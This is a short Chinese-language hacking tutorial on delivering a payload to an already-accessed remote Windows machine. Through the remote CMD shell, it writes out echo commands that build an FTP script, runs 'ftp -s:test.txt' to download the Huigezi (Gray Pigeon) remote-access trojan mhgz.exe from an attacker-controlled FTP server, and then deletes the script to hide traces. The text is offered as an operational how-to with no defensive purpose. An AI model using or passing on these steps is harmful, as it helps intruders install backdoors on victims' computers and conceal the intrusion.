在远程计算机的CMD环境下，如果不能通过IPC$渠道传送文件，那就只有通过FTP下载文件了。
假设我们已经有一个FTP服务器，上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道FTP服务器的三个参数：

1、FTP服务器的IP地址：如1.1.1.1
2、FTP服务器的用户名：如test
3、FTP服务器的密 码：如test123

在远程计算机的CMD下依次输入下面的命令：

1、echo open 1.1.1.1>>test.txt 登陆FTP服务器
2、echo test>>test.txt 用户名
3、echo test123>>test.txt 密码
4、echo bin>>test.txt 开始
5、echo get mhgz.exe>>test.txt 下载灰鸽子木马
6、echo bye>>test.txt 关闭FTP服务器

输入上面命令后，在远程计算机上就会生成一个test.txt文件，内容为：
open 1.1.1.1
test
test123
bin
get mhgz.exe
bye

现在我们在远程计算机上执行下面的命令：
ftp -s:test.txt 意思是，读取test.txt里的参数，执行ftp命令，命令执行完后，灰鸽子木马文件mhgz.exe就下载到对方计算机里了。


del c:\test.txt